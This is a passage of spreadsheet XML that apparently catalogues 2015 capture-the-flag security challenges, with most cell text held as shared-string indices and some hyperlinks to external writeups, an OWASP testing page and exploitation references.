      <c r="A177" s="30" t="s">
        <v>1265</v>
      </c>
      <c r="B177" s="31">
        <v>2015.0</v>
      </c>
      <c r="C177" s="30" t="s">
        <v>2968</v>
      </c>
      <c r="D177" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E177" s="30" t="s">
        <v>2969</v>
      </c>
      <c r="F177" s="35" t="s">
        <v>2970</v>
      </c>
      <c r="G177" s="30" t="s">
        <v>2971</v>
      </c>
      <c r="H177" s="33" t="str">
        <f>HYPERLINK("https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion","Testing for local file inclusion")</f>
        <v>Testing for local file inclusion</v>
      </c>
      <c r="I177" s="30"/>
    </row>
    <row r="178">
      <c r="A178" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B178" s="31">
        <v>2015.0</v>
      </c>
      <c r="C178" s="30" t="s">
        <v>2980</v>
      </c>
      <c r="D178" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E178" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F178" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G178" s="30" t="s">
        <v>2986</v>
      </c>
      <c r="H178" s="30" t="s">
        <v>2988</v>
      </c>
      <c r="I178" s="33" t="str">
        <f>HYPERLINK("https://github.com/aweinstock314/aweinstock-ctf-writeups/blob/master/csaw_finals_2015/exploitation500_boombox/boombox_writeup.md","Full-Writeup")</f>
        <v>Full-Writeup</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="30" t="s">
        <v>1852</v>
      </c>
      <c r="B179" s="31">
        <v>2015.0</v>
      </c>
      <c r="C179" s="30" t="s">
        <v>3010</v>
      </c>
      <c r="D179" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E179" s="30" t="s">
        <v>3013</v>
      </c>
      <c r="F179" s="35" t="s">
        <v>3016</v>
      </c>
      <c r="G179" s="30" t="s">
        <v>3018</v>
      </c>
      <c r="H179" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Control_register#CR4","SMEP")</f>
        <v>SMEP</v>
      </c>
      <c r="I179" s="33" t="str">
        <f>HYPERLINK("http://itszn.com/blog/?p=21","Full-Writeup")</f>
        <v>Full-Writeup</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="113" t="s">
        <v>1300</v>
      </c>
      <c r="B180" s="115">
        <v>2015.0</v>
      </c>
      <c r="C180" s="113" t="s">
        <v>3043</v>
      </c>
      <c r="D180" s="113" t="s">
        <v>128</v>
      </c>
      <c r="E180" s="113" t="s">
        <v>2080</v>
      </c>
      <c r="F180" s="113" t="s">
        <v>3049</v>
      </c>
      <c r="G180" s="30"/>
      <c r="H180" s="163" t="str">
        <f>HYPERLINK("https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/","LD_Preload")</f>
        <v>LD_Preload</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B181" s="43">
        <v>2015.0</v>
      </c>
      <c r="C181" s="5" t="s">
        <v>3252</v>
      </c>
      <c r="D181" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E181" s="5" t="s">
        <v>676</v>
      </c>
      <c r="F181" s="5" t="s">
        <v>3253</v>
      </c>
      <c r="G181" s="5" t="s">
        <v>3254</v>
      </c>
      <c r="H181" s="5" t="s">
        <v>3255</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="s">
        <v>1303</v>
      </c>
      <c r="B182" s="43">
        <v>2015.0</v>
      </c>
      <c r="C182" s="5" t="s">
        <v>3256</v>
      </c>
      <c r="D182" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E182" s="5" t="s">
        <v>3061</v>
      </c>
      <c r="F182" s="5" t="s">
        <v>3257</v>
      </c>
      <c r="G182" s="5" t="s">
        <v>3258</v>
      </c>
      <c r="H182" s="5" t="s">
        <v>2767</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B183" s="31">
        <v>2015.0</v>
      </c>
      <c r="C183" s="30" t="s">
        <v>3259</v>
      </c>
      <c r="D183" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E183" s="30"/>
      <c r="F183" s="30" t="s">
        <v>3260</v>
      </c>
      <c r="G183" s="30" t="s">
        <v>3261</v>
      </c>
      <c r="H183" s="30"/>
      <c r="I183" s="140" t="s">
        <v>3262</v>
      </c>
      <c r="J183" s="30"/>
      <c r="K183" s="30"/>
    </row>
    <row r="184">
      <c r="A184" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B184" s="31">
        <v>2015.0</v>
      </c>
      <c r="C184" s="30" t="s">
        <v>3268</v>
      </c>
      <c r="D184" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E184" s="30" t="s">
        <v>3270</v>
      </c>
      <c r="F184" s="30" t="s">
        <v>3272</v>
      </c>
      <c r="G184" s="30" t="s">
        <v>3273</v>
      </c>
      <c r="H184" s="30"/>
      <c r="I184" s="30"/>
      <c r="J184" s="30"/>
      <c r="K184" s="30"/>
    </row>
    <row r="185">
      <c r="A185" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B185" s="31">
        <v>2015.0</v>
      </c>
      <c r="C185" s="30" t="s">
        <v>3281</v>
      </c>
      <c r="D185" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E185" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F185" s="30"/>
      <c r="G185" s="30" t="s">
        <v>3282</v>
      </c>
      <c r="H185" s="30"/>
      <c r="I185" s="30"/>
      <c r="J185" s="30"/>
      <c r="K185" s="30"/>
    </row>
    <row r="186">
      <c r="A186" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B186" s="31">
        <v>2015.0</v>
      </c>
      <c r="C186" s="30" t="s">
        <v>3288</v>
      </c>
      <c r="D186" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E186" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F186" s="30" t="s">
        <v>3291</v>
      </c>
      <c r="G186" s="30" t="s">
        <v>3292</v>
      </c>
      <c r="H186" s="30"/>
      <c r="I186" s="30"/>
      <c r="J186" s="30"/>
      <c r="K186" s="30"/>
    </row>
    <row r="187">
      <c r="A187" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B187" s="31">
        <v>2015.0</v>
      </c>
      <c r="C187" s="30" t="s">
        <v>3297</v>
      </c>
      <c r="D187" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E187" s="30"/>
      <c r="F187" s="30" t="s">
        <v>3299</v>
      </c>
      <c r="G187" s="30" t="s">
        <v>3301</v>
      </c>
      <c r="H187" s="30"/>
      <c r="I187" s="30"/>
      <c r="J187" s="30"/>
      <c r="K187" s="30"/>
    </row>
    <row r="188">
      <c r="A188" s="30" t="s">
        <v>1334</v>
      </c>
      <c r="B188" s="31">
        <v>2015.0</v>
      </c>
      <c r="C188" s="30" t="s">
        <v>3307</v>
      </c>
      <c r="D188" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E188" s="30"/>
      <c r="F188" s="30" t="s">
        <v>130</v>
      </c>
      <c r="G188" s="30" t="s">
        <v>130</v>
      </c>
      <c r="H188" s="30"/>
      <c r="I188" s="30"/>
      <c r="J188" s="30"/>
      <c r="K188" s="30"/>
    </row>
    <row r="189">
      <c r="A189" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B189" s="31">
        <v>2015.0</v>
      </c>
      <c r="C189" s="30" t="s">
        <v>3309</v>
      </c>
      <c r="D189" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E189" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F189" s="30" t="s">
        <v>0</v>
      </c>
      <c r="G189" s="30" t="s">
        <v>3311</v>
      </c>
      <c r="H189" s="30"/>
      <c r="I189" s="30"/>
      <c r="J189" s="30"/>
      <c r="K189" s="30"/>
    </row>
    <row r="190">
      <c r="A190" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B190" s="31">
        <v>2015.0</v>
      </c>
      <c r="C190" s="30" t="s">
        <v>3314</v>
      </c>
      <c r="D190" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E190" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F190" s="30" t="s">
        <v>3315</v>
      </c>
      <c r="G190" s="30" t="s">
        <v>3316</v>
      </c>
      <c r="H190" s="30"/>
      <c r="I190" s="30"/>
      <c r="J190" s="30"/>
      <c r="K190" s="30"/>
    </row>
    <row r="191">
      <c r="A191" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B191" s="31">
        <v>2015.0</v>
      </c>
      <c r="C191" s="30" t="s">
        <v>3323</v>
      </c>
      <c r="D191" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E191" s="30" t="s">
        <v>407</v>
      </c>
      <c r="F191" s="30"/>
      <c r="G191" s="30" t="s">
        <v>3325</v>
      </c>
      <c r="H191" s="30"/>
      <c r="I191" s="30"/>
      <c r="J191" s="30"/>
      <c r="K191" s="30"/>
    </row>
    <row r="192">
      <c r="A192" s="30" t="s">
        <v>1988</v>
      </c>
      <c r="B192" s="31">
        <v>2015.0</v>
      </c>
      <c r="C192" s="30" t="s">
        <v>3329</v>
      </c>
      <c r="D192" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E192" s="30" t="s">
        <v>1805</v>
      </c>
      <c r="F192" s="30" t="s">
        <v>601</v>
      </c>
      <c r="G192" s="30" t="s">
        <v>601</v>
      </c>
      <c r="H192" s="30"/>
      <c r="I192" s="30"/>
      <c r="J192" s="30"/>
      <c r="K192" s="30"/>
    </row>
    <row r="193">
      <c r="A193" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B193" s="43">
        <v>2015.0</v>
      </c>
      <c r="C193" s="5" t="s">
        <v>3342</v>
      </c>
      <c r="D193" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E193" s="5" t="s">
        <v>91</v>
      </c>
      <c r="F193" s="5" t="s">
        <v>3344</v>
      </c>
      <c r="G193" s="169" t="s">
        <v>3346</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B194" s="43">
        <v>2015.0</v>
      </c>
      <c r="C194" s="5" t="s">
        <v>3354</v>
      </c>
      <c r="D194" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E194" s="5" t="s">
        <v>116</v>
      </c>
      <c r="F194" s="5" t="s">
        <v>3355</v>
      </c>
      <c r="G194" s="5" t="s">
        <v>3356</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="s">
        <v>3360</v>
      </c>
      <c r="B195" s="43">
        <v>2015.0</v>
      </c>
      <c r="C195" s="5" t="s">
        <v>3361</v>
      </c>
      <c r="D195" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E195" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F195" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G195" s="5" t="s">
        <v>3362</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="s">
        <v>3360</v>
      </c>
      <c r="B196" s="43">
        <v>2015.0</v>
      </c>
      <c r="C196" s="5" t="s">
        <v>3372</v>
      </c>
      <c r="D196" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E196" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F196" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G196" s="5" t="s">
        <v>3374</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="s">
        <v>3360</v>
      </c>
      <c r="B197" s="43">
        <v>2015.0</v>
      </c>
      <c r="C197" s="5" t="s">
        <v>3381</v>
      </c>
      <c r="D197" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E197" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F197" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G197" s="5" t="s">
        <v>3383</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="s">
        <v>3360</v>
      </c>
      <c r="B198" s="43">
        <v>2015.0</v>
      </c>
      <c r="C198" s="5" t="s">
        <v>3389</v>
      </c>
      <c r="D198" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E198" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F198" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G198" s="5" t="s">
        <v>3391</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="s">
        <v>3360</v>
      </c>
      <c r="B199" s="43">
        <v>2015.0</v>
      </c>
      <c r="C199" s="5" t="s">
        <v>3396</v>
      </c>
      <c r="D199" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E199" s="5" t="s">
        <v>407</v>
      </c>
      <c r="F199" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G199" s="5" t="s">
        <v>3397</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="17">
        <v>42577.0</v>
      </c>
      <c r="B200" s="65"/>
      <c r="C200" s="65"/>
      <c r="D200" s="65"/>
      <c r="E200" s="9"/>
      <c r="F200" s="65"/>
      <c r="G200" s="65"/>
      <c r="H200" s="66"/>
      <c r="I200" s="9"/>
      <c r="J200" s="9"/>
      <c r="K200" s="9"/>
      <c r="L200" s="9"/>
      <c r="M200" s="9"/>
      <c r="N200" s="9"/>
      <c r="O200" s="9"/>
      <c r="P200" s="9"/>
      <c r="Q200" s="9"/>
      <c r="R200" s="9"/>
      <c r="S200" s="9"/>
      <c r="T200" s="9"/>
      <c r="U200" s="9"/>
      <c r="V200" s="9"/>
      <c r="W200" s="9"/>
      <c r="X200" s="9"/>
      <c r="Y200" s="9"/>
      <c r="Z200" s="9"/>
    </row>
    <row r="201">
      <c r="A201" s="113" t="s">
        <v>1473</v>
      </c>
      <c r="B201" s="115">
        <v>2015.0</v>
      </c>
      <c r="C201" s="113" t="s">
        <v>3398</v>
      </c>
      <c r="D201" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E201" s="113" t="s">
        <v>997</v>
      </c>
      <c r="F201" s="111" t="s">
        <v>3399</v>
      </c>
      <c r="G201" s="113" t="s">
        <v>3400</v>
      </c>
      <c r="H201" s="113" t="s">
        <v>3401</v>
      </c>
      <c r="I201" s="30"/>
      <c r="J201" s="30"/>
    </row>
    <row r="202">
      <c r="A202" s="113" t="s">
        <v>1473</v>
      </c>
      <c r="B202" s="115">
        <v>2015.0</v>
      </c>
      <c r="C202" s="113" t="s">
        <v>3402</v>
      </c>
      <c r="D202" s="113" t="s">
        <v>128</v>
      </c>
      <c r="E202" s="113" t="s">
        <v>2080</v>
      </c>
      <c r="F202" s="111" t="s">
        <v>3399</v>
      </c>
      <c r="G202" s="113" t="s">
        <v>3403</v>
      </c>
      <c r="H202" s="163" t="str">
        <f>HYPERLINK("http://googleprojectzero.blogspot.co.il/2014/08/the-poisoned-nul-byte-2014-edition.html","Poisoned Null Byte")</f>
        <v>Poisoned Null Byte</v>
      </c>
      <c r="I202" s="163" t="str">
        <f>HYPERLINK("http://stackoverflow.com/questions/17630745/why-ulimit-s-unlimited-can-de-aslr-in-overflow","Why 'Ulimit -s' can de ASLR in overflow")</f>
        <v>Why 'Ulimit -s' can de ASLR in overflow</v>
      </c>
      <c r="J202" s="30"/>
    </row>
    <row r="203">
      <c r="A203" s="30" t="s">
        <v>3408</v>
      </c>
      <c r="B203" s="31">
        <v>2015.0</v>
      </c>
      <c r="C203" s="30" t="s">
        <v>3409</v>
      </c>
      <c r="D203" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E203" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F203" s="35" t="s">
        <v>1511</v>
      </c>
      <c r="G203" s="113" t="s">
        <v>3410</v>
      </c>
      <c r="H203" s="113" t="s">
        <v>3411</v>
      </c>
      <c r="I203" s="30"/>
      <c r="J203" s="30"/>
    </row>
    <row r="204">
      <c r="A204" s="30" t="s">
        <v>3408</v>
      </c>
      <c r="B204" s="31">
        <v>2015.0</v>
      </c>
      <c r="C204" s="30" t="s">
        <v>3417</v>
      </c>
      <c r="D204" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E204" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F204" s="35" t="s">
        <v>3419</v>
      </c>
      <c r="G204" s="113" t="s">
        <v>3421</v>
      </c>
      <c r="H204" s="113" t="s">
        <v>3423</v>
      </c>
      <c r="I204" s="30"/>
      <c r="J204" s="30"/>
    </row>
    <row r="205">
      <c r="A205" s="113" t="s">
        <v>3408</v>
      </c>
      <c r="B205" s="115">
        <v>2015.0</v>
      </c>
      <c r="C205" s="113" t="s">
        <v>3429</v>
      </c>
      <c r="D205" s="113" t="s">
        <v>48</v>
      </c>
      <c r="E205" s="113" t="s">
        <v>2080</v>
      </c>
      <c r="F205" s="111" t="s">
        <v>3399</v>
      </c>
      <c r="G205" s="113" t="s">
        <v>3430</v>
      </c>
      <c r="H205" s="163" t="str">
        <f>HYPERLINK("https://github.com/0vercl0k/rp","rp++")</f>
        <v>rp++</v>
      </c>
      <c r="I205" s="113" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B206" s="31">
        <v>2015.0</v>
      </c>
      <c r="C206" s="30" t="s">
        <v>3445</v>
      </c>
      <c r="D206" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E206" s="30" t="s">
        <v>3447</v>
      </c>
      <c r="F206" s="35" t="s">
        <v>3399</v>
      </c>
      <c r="G206" s="30" t="s">
        <v>3449</v>
      </c>
      <c r="H206" s="33" t="str">
        <f>HYPERLINK("https://github.com/CyberGrandChallenge/cgc-release-documentation","cgc documentation")</f>
        <v>cgc documentation</v>
      </c>
      <c r="I206" s="30"/>
      <c r="J206" s="30"/>
    </row>
    <row r="207">
      <c r="A207" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B207" s="31">
        <v>2015.0</v>
      </c>
      <c r="C207" s="30" t="s">
        <v>3455</v>
      </c>
      <c r="D207" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E207" s="30" t="s">
        <v>3456</v>
      </c>
      <c r="F207" s="35" t="s">
        <v>3399</v>
      </c>
      <c r="G207" s="30" t="s">
        <v>3457</v>
      </c>
      <c r="H207" s="33" t="str">
        <f>HYPERLINK("http://lokalhost.pl/ctf/defcon2015/fuck.py","solution.py")</f>
        <v>solution.py</v>
      </c>
      <c r="I207" s="30" t="s">
        <v>2108</v>
      </c>
      <c r="J207" s="30"/>
    </row>
    <row r="208">
      <c r="A208" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B208" s="31">
        <v>2015.0</v>
      </c>
      <c r="C208" s="30" t="s">
        <v>3462</v>
      </c>
      <c r="D208" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E208" s="30" t="s">
        <v>3463</v>
      </c>
      <c r="F208" s="35" t="s">
        <v>3465</v>
      </c>
      <c r="G208" s="30" t="s">
        <v>3466</v>
      </c>
      <c r="H208" s="33" t="str">
        <f>HYPERLINK("http://vulph.com/2015/09/27/defcon-hackercalc-writeup.html","writeup")</f>
        <v>writeup</v>
      </c>
      <c r="I208" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="J208" s="30"/>
    </row>
    <row r="209">
      <c r="A209" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B209" s="31">
        <v>2015.0</v>
      </c>
      <c r="C209" s="30" t="s">
        <v>3477</v>
      </c>
      <c r="D209" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E209" s="30" t="s">
        <v>3463</v>
      </c>
      <c r="F209" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G209" s="30" t="s">
        <v>3478</v>
      </c>
      <c r="H209" s="30" t="s">
        <v>3479</v>
      </c>
      <c r="I209" s="30"/>
    </row>
    <row r="210">
      <c r="A210" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B210" s="31">
        <v>2015.0</v>
      </c>
      <c r="C210" s="30" t="s">
        <v>3481</v>
      </c>
      <c r="D210" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E210" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F210" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G210" s="30" t="s">
        <v>3484</v>
      </c>
      <c r="H210" s="33" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol","SNMP - Ver 3 (RFC 2750)")</f>
        <v>SNMP - Ver 3 (RFC 2750)</v>
      </c>
      <c r="I210" s="30"/>
    </row>
    <row r="211">
      <c r="A211" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B211" s="31">
        <v>2015.0</v>
      </c>
      <c r="C211" s="30" t="s">
        <v>3489</v>
      </c>
      <c r="D211" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E211" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F211" s="35" t="s">
        <v>3490</v>
      </c>
      <c r="G211" s="30" t="s">
        <v>3492</v>
      </c>
      <c r="H211" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B212" s="31">
        <v>2015.0</v>
      </c>
      <c r="C212" s="30" t="s">
        <v>3494</v>
      </c>
      <c r="D212" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E212" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F212" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G212" s="30" t="s">
        <v>3496</v>
      </c>
      <c r="H212" s="30" t="s">
        <v>3498</v>
      </c>
      <c r="I212" s="30"/>
    </row>
    <row r="213">
      <c r="A213" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B213" s="31">
        <v>2015.0</v>
      </c>
      <c r="C213" s="30" t="s">
        <v>1695</v>
      </c>
      <c r="D213" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E213" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F213" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G213" s="30" t="s">
        <v>3503</v>
      </c>
      <c r="H213" s="30" t="s">
        <v>3503</v>
      </c>
      <c r="I213" s="30"/>
      <c r="J213" s="30"/>
      <c r="K213" s="30"/>
    </row>
    <row r="214">
      <c r="A214" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B214" s="31">
        <v>2015.0</v>
      </c>
      <c r="C214" s="30" t="s">
        <v>3507</v>
      </c>
      <c r="D214" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E214" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F214" s="33" t="s">
        <v>3508</v>
      </c>
      <c r="G214" s="30"/>
      <c r="H214" s="30"/>
      <c r="I214" s="30"/>
    </row>
    <row r="215">
      <c r="A215" s="109" t="s">
        <v>1607</v>
      </c>
      <c r="B215" s="126">
        <v>2015.0</v>
      </c>
      <c r="C215" s="109" t="s">
        <v>3516</v>
      </c>
      <c r="D215" s="109" t="s">
        <v>23</v>
      </c>
      <c r="E215" s="109" t="s">
        <v>1787</v>
      </c>
      <c r="F215" s="127" t="s">
        <v>3518</v>
      </c>
      <c r="G215" s="109" t="s">
        <v>3520</v>
      </c>
      <c r="H215" s="129" t="str">
        <f>HYPERLINK("https://en.wikipedia.org/wiki/Shellshock_(software_bug)","ShellShock Exploit")</f>
        <v>ShellShock Exploit</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B216" s="31">
        <v>2015.0</v>
      </c>
      <c r="C216" s="30" t="s">
        <v>3536</v>
      </c>
      <c r="D216" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E216" s="30" t="s">
        <v>3537</v>
      </c>
      <c r="F216" s="35" t="s">
        <v>3539</v>
      </c>
      <c r="G216" s="30" t="s">
        <v>3541</v>
      </c>
      <c r="H216" s="30" t="s">
        <v>3543</v>
      </c>
      <c r="I216" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/tree/master/mma-ctf-2015/pwn/rps-50","writeup")</f>
        <v>writeup</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B217" s="31">
        <v>2015.0</v>
      </c>
      <c r="C217" s="30" t="s">
        <v>3550</v>
      </c>
      <c r="D217" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E217" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F217" s="35" t="s">
        <v>688</v>
      </c>
      <c r="G217" s="30" t="s">
        <v>3553</v>
      </c>
      <c r="H217" s="33" t="str">
        <f>HYPERLINK("https://hexpresso.wordpress.com/2015/04/06/quals_ndh-2k15-secure-auth-exploit-350-writeup/"," Writeup and script")</f>
        <v> Writeup and script</v>
      </c>
      <c r="I217" s="30"/>
    </row>
    <row r="218">
      <c r="A218" s="30" t="s">
        <v>2131</v>
      </c>
      <c r="B218" s="31">
        <v>2015.0</v>
      </c>
      <c r="C218" s="30" t="s">
        <v>3556</v>
      </c>
      <c r="D218" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E218" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F218" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G218" s="30" t="s">
        <v>3557</v>
      </c>
      <c r="H218" s="30" t="s">
        <v>1809</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="30" t="s">
        <v>2136</v>
      </c>
      <c r="B219" s="31">
        <v>2015.0</v>
      </c>
      <c r="C219" s="30" t="s">
        <v>3558</v>
      </c>
      <c r="D219" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E219" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F219" s="35" t="s">
        <v>1748</v>
      </c>
      <c r="G219" s="30" t="s">
        <v>3559</v>
      </c>
      <c r="H219" s="30" t="s">
        <v>3560</v>
      </c>
      <c r="I219" s="30"/>
    </row>
    <row r="220">
      <c r="A220" s="30" t="s">
        <v>2136</v>
      </c>
      <c r="B220" s="31">
        <v>2015.0</v>
      </c>
      <c r="C220" s="30" t="s">
        <v>3561</v>
      </c>
      <c r="D220" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E220" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F220" s="103" t="s">
        <v>3562</v>
      </c>
      <c r="G220" s="104" t="s">
        <v>3563</v>
      </c>
      <c r="H220" s="30" t="s">
        <v>3560</v>
      </c>
      <c r="I220" s="30"/>
    </row>
    <row r="221">
      <c r="A221" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B221" s="43">
        <v>2015.0</v>
      </c>
      <c r="C221" s="5" t="s">
        <v>3564</v>
      </c>
      <c r="D221" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E221" s="3"/>
      <c r="F221" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G221" s="5" t="s">
        <v>3565</v>
      </c>
      <c r="H221" s="3"/>
    </row>
    <row r="222">
      <c r="A222" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B222" s="31">
        <v>2015.0</v>
      </c>
      <c r="C222" s="30" t="s">
        <v>3566</v>
      </c>
      <c r="D222" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E222" s="30" t="s">
        <v>3567</v>
      </c>
      <c r="F222" s="35" t="s">
        <v>3568</v>
      </c>
      <c r="G222" s="30" t="s">
        <v>3569</v>
      </c>
      <c r="H222" s="30" t="s">
        <v>3570</v>
      </c>
      <c r="I222" s="30"/>
    </row>
    <row r="223">
      <c r="A223" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B223" s="31">
        <v>2015.0</v>
      </c>
      <c r="C223" s="30" t="s">
        <v>3571</v>
      </c>
      <c r="D223" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E223" s="30" t="s">
        <v>573</v>
      </c>
      <c r="F223" s="35" t="s">
        <v>3572</v>
      </c>
      <c r="G223" s="30" t="s">
        <v>3573</v>
      </c>
      <c r="H223" s="30"/>
    </row>
  </sheetData>
  <autoFilter ref="$A$1:$Z$28"/>
  <mergeCells count="11">
    <mergeCell ref="G60:I60"/>
    <mergeCell ref="G43:H43"/>
    <mergeCell ref="G143:H143"/>
    <mergeCell ref="G144:I144"/>
    <mergeCell ref="G142:H142"/>
    <mergeCell ref="G141:H141"/>
    <mergeCell ref="G58:K58"/>
    <mergeCell ref="G54:K54"/>
    <mergeCell ref="G145:H145"/>
    <mergeCell ref="G146:H146"/>
    <mergeCell ref="G59:M59"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="I37"/>
    <hyperlink r:id="rId2" ref="I40"/>
    <hyperlink r:id="rId3" ref="H67"/>
    <hyperlink r:id="rId4" ref="H68"/>
    <hyperlink r:id="rId5" ref="H69"/>
    <hyperlink r:id="rId6" ref="H99"/>
    <hyperlink r:id="rId7" ref="I99"/>
    <hyperlink r:id="rId8" ref="H124"/>
    <hyperlink r:id="rId9" ref="H126"/>
    <hyperlink r:id="rId10" ref="H127"/>
    <hyperlink r:id="rId11" ref="H130"/>
    <hyperlink r:id="rId12" ref="H134"/>
    <hyperlink r:id="rId13" ref="H135"/>
    <hyperlink r:id="rId14" ref="I148"/>
    <hyperlink r:id="rId15" ref="H164"/>
    <hyperlink r:id="rId16" location="Filtering" ref="I164"/>
    <hyperlink r:id="rId17" ref="H165"/>
    <hyperlink r:id="rId18" ref="H166"/>
    <hyperlink r:id="rId19" ref="H168"/>
    <hyperlink r:id="rId20" ref="H169"/>
    <hyperlink r:id="rId21" ref="I169"/>
    <hyperlink r:id="rId22" ref="H173"/>
    <hyperlink r:id="rId23" ref="H177"/>
    <hyperlink r:id="rId24" ref="I178"/>
    <hyperlink r:id="rId25" location="CR4" ref="H179"/>
    <hyperlink r:id="rId26" ref="I179"/>
